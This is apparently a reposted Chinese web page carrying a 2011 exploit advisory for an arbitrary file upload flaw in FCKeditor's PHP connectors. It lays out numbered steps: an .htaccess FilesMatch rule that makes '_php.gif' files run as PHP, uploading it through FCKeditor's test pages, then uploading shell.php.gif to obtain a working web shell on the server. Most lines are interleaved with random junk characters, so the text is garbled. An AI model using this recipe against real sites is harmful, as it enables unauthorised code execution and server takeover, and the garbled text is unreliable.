FCKeditor所有php版本Upload上传漏洞
. s! M: B) S" J9 V+ _' T作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:070 g* j2 D7 W3 b8 j
减小字体 增大字体% U2 b* ?, Z! g' u
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability Y0 A# ]' z/ c$ B& A" x" e. k
[+] Date: 2011
+ F2 ~$ q$ @+ p/ }2 v[+] Author : sinesafe.cn" ~4 e* i9 y4 w
[+] Website : WwW.sinesafe.cn
9 V( _8 z, M: R$ i———————————————————5 N& l e/ j4 K' u( {3 G
1.create a htaccess file:
, M3 R9 ^9 R8 a: F6 Ycode:
4 \1 i% _5 [* D! h<FilesMatch “_php.gif”>+ C; H0 p2 A$ [, z% `
SetHandler application/x-httpd-php
" O i) \8 Z* `1 c: O, L</FilesMatch>
2 X, {' t( w& U, o; w) A! _2 v; r' n' Y9 g; ]
2.Now upload this htaccess with FCKeditor.
* S. p/ [& Z7 Q: K
9 @8 B" r" _% v4 g; _, M' W# K, q6 ^6 |http://www.sinesafe.cn/FCKeditor ... er/upload/test.html1 w/ N: k8 Y3 g) R3 q
# ~: W# m# h7 Z' e3 Ahttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html8 K' d( g# s8 _
! M% V* M: M# T5 S3 E
———————————————————————————————-9 \. J6 g2 a; E. p- A) ^) _. R- G
3.Now upload shell.php.gif with FCKeditor.
# q5 p- g+ l+ P' c% H# B4 z4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.. N: y5 w# d- U$ a5 M
5.http://www.sinesafe.cn/anything/shell_php.gif
6 Z `, ?. w0 y" C$ x# [- a% A( s6.Now shell is available from server. |
- Z6 U) h+ W$ A3 O2 C6 v$ d% ~4 c0 A+ P
' i4 v. V- M! C' Z" L7 N4 S |
发表于 2013-10-27 17:25:21
收藏
支持
反对